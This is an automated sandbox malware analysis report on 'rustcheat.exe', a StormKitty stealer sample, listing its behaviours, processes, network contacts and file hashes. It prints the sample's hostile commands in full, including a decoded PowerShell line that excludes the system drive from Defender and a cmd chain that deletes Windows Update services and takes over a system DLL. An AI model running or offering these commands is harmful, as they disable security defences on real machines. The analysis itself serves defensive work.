Malware Analysis Report

2025-01-03 06:39

Sample ID: 230812-pwffradg5v
Target: rustcheat.exe
SHA256: d369a5d2ef50b7e9eea2e61b45294270c0a27cad70edb47cf61ba76f1810fad7
Tags: stormkitty discovery evasion exploit stealer vmprotect
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: d369a5d2ef50b7e9eea2e61b45294270c0a27cad70edb47cf61ba76f1810fad7

Threat Level: Known bad

The file rustcheat.exe was found to be: Known bad.

Malicious Activity Summary

stormkitty discovery evasion exploit stealer vmprotect

Modifies security service

StormKitty payload

StormKitty

Stops running service(s)

Possible privilege escalation attempt

Downloads MZ/PE file

Modifies file permissions

Executes dropped EXE

VMProtect packed file

Loads dropped DLL

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Kills process with taskkill

Modifies system certificate store

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2023-08-12 12:40

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2023-08-12 12:40
Reported: 2023-08-12 12:43
Platform: win10v2004-20230703-en
Max time kernel: 12s
Max time network: 19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\rustcheat.exe"

Signatures

Modifies security service

evasion
Description | Indicator | Process | Target
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\system32\reg.exe | N/A
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\system32\reg.exe | N/A
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\system32\reg.exe | N/A
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\system32\reg.exe | N/A
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\system32\reg.exe | N/A

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\testy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\testy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1936 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\rustcheat.exe | C:\Users\Admin\AppData\Local\Temp\testy.exe
PID 1936 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\rustcheat.exe | C:\Users\Admin\AppData\Local\Temp\testy.exe
PID 1936 wrote to memory of 1496 | N/A | C:\Users\Admin\AppData\Local\Temp\rustcheat.exe | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
PID 1936 wrote to memory of 1496 | N/A | C:\Users\Admin\AppData\Local\Temp\rustcheat.exe | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
PID 2576 wrote to memory of 4668 | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 4668 | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 4448 | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | C:\Windows\System32\cmd.exe
PID 2576 wrote to memory of 4448 | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | C:\Windows\System32\cmd.exe
PID 2576 wrote to memory of 3416 | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | C:\Windows\System32\cmd.exe
PID 2576 wrote to memory of 3416 | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | C:\Windows\System32\cmd.exe
PID 4448 wrote to memory of 4420 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 4420 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 1200 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 1200 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 1480 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 1480 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 3416 wrote to memory of 2044 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 3416 wrote to memory of 2044 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 4448 wrote to memory of 4884 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 4884 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 1148 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 1148 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 4384 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 4448 wrote to memory of 4384 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 3416 wrote to memory of 4676 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 3416 wrote to memory of 4676 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 4448 wrote to memory of 216 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 4448 wrote to memory of 216 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 3416 wrote to memory of 4944 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 3416 wrote to memory of 4944 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 3416 wrote to memory of 3324 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 3416 wrote to memory of 3324 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\powercfg.exe
PID 4448 wrote to memory of 4436 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 4448 wrote to memory of 4436 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 4448 wrote to memory of 4540 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 4448 wrote to memory of 4540 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 4448 wrote to memory of 4964 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 4448 wrote to memory of 4964 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 4448 wrote to memory of 1244 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 4448 wrote to memory of 1244 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe

Processes

C:\Users\Admin\AppData\Local\Temp\rustcheat.exe

"C:\Users\Admin\AppData\Local\Temp\rustcheat.exe"

C:\Users\Admin\AppData\Local\Temp\testy.exe

"C:\Users\Admin\AppData\Local\Temp\testy.exe"

C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe

"C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"

Decoded (UTF-16LE): <#ub#> Add-MpPreference <#qbue#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#jed#> -Force <#ybor#>
The <#...#> block comments are no-ops inserted as padding; the effective command adds the user profile and the system drive to the Microsoft Defender exclusion list.

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[base64 argument not preserved in this copy of the report]"

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\testy.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe

MD5 7b8fcb29905e045b7f8c1dc9bc305698
SHA1 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8
SHA256 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173
SHA512 d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2

memory/1496-157-0x0000000000230000-0x0000000000280000-memory.dmp

memory/2576-158-0x0000000000D50000-0x000000000116E000-memory.dmp

memory/1496-159-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

memory/2576-160-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

memory/2576-161-0x000000001CE60000-0x000000001CE70000-memory.dmp

memory/1496-162-0x000000001BDC0000-0x000000001BDD0000-memory.dmp

memory/4668-168-0x0000013F95060000-0x0000013F95082000-memory.dmp

memory/4668-173-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nnunhuth.zn0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4668-175-0x0000013F955B0000-0x0000013F955C0000-memory.dmp

memory/4668-174-0x0000013F955B0000-0x0000013F955C0000-memory.dmp

memory/4668-176-0x0000013F955B0000-0x0000013F955C0000-memory.dmp

memory/4668-179-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

memory/1496-180-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

memory/2576-181-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll

MD5 6d1c62ec1c2ef722f49b2d8dd4a4df16
SHA1 1bb08a979b7987bc7736a8cfa4779383cb0ecfa6
SHA256 00da1597d92235d3f84da979e2fa5dbf049bafb52c33bd6fc8ee7b29570c124c
SHA512 c0dce8eaa52eb6c319d4be2eec4622bb3380c65b659cfb77ff51a4ada7d3e591e791ee823dad67b5556ffac5c060ff45d09dd1cc21baaf70ba89806647cb3bd2

C:\Users\Admin\AppData\Local\Temp\AnonFileApi.dll

MD5 7a2d5deab61f043394a510f4e2c0866f
SHA1 ca16110c9cf6522cd7bea32895fd0f697442849b
SHA256 75db945388f62f2de3d3eaae911f49495f289244e2fec9b25455c2d686989f69
SHA512 b66b0bf227762348a5ede3c2578d5bc089c222f632a705241bcc63d56620bef238c67ca2bd400ba7874b2bc168e279673b0e105b73282bc69aa21a7fd34bafe0

memory/2576-192-0x000000001CE60000-0x000000001CE70000-memory.dmp

memory/2576-193-0x000000001CD90000-0x000000001CDA2000-memory.dmp

memory/1496-194-0x000000001BDC0000-0x000000001BDD0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/4744-205-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

memory/4744-206-0x000001831BD60000-0x000001831BD70000-memory.dmp

memory/4744-207-0x000001831BD60000-0x000001831BD70000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/4744-209-0x000001831BD60000-0x000001831BD70000-memory.dmp

memory/4744-212-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

MD5 5802cd85f72d4d1afcf72d5daeb12e0a
SHA1 61f7f3cb6dcf20edfb29f56cb6fabe529cc4a59e
SHA256 91d8fd9f83b068436c733b72e2c128092ce55a56ff936ef6ae042b332ba0edf6
SHA512 fce715c7aca23d2787f6e38d507ace7c49293b0f73dc8525839eb9736d99b82881a9e4904dae2117c577917d1bc161150119b767e26870521c997378f55c3505

memory/2296-216-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted: 2023-08-12 12:40
Reported: 2023-08-12 12:43
Platform: win7-20230712-en
Max time kernel: 135s
Max time network: 123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\rustcheat.exe"

Signatures

Modifies security service

evasion
Description | Indicator | Process | Target
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | C:\Windows\system32\reg.exe | N/A
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security | C:\Windows\system32\reg.exe | N/A

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Stops running service(s)

evasion

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies system certificate store

evasion spyware trojan
Description | Indicator | Process | Target
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = [certificate blob not preserved in this copy of the report] | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2588 wrote to memory of 2232 | N/A | C:\Users\Admin\AppData\Local\Temp\rustcheat.exe | C:\Users\Admin\AppData\Local\Temp\testy.exe
PID 2588 wrote to memory of 2232 | N/A | C:\Users\Admin\AppData\Local\Temp\rustcheat.exe | C:\Users\Admin\AppData\Local\Temp\testy.exe
PID 2588 wrote to memory of 2232 | N/A | C:\Users\Admin\AppData\Local\Temp\rustcheat.exe | C:\Users\Admin\AppData\Local\Temp\testy.exe
PID 2588 wrote to memory of 2232 | N/A | C:\Users\Admin\AppData\Local\Temp\rustcheat.exe | C:\Users\Admin\AppData\Local\Temp\testy.exe
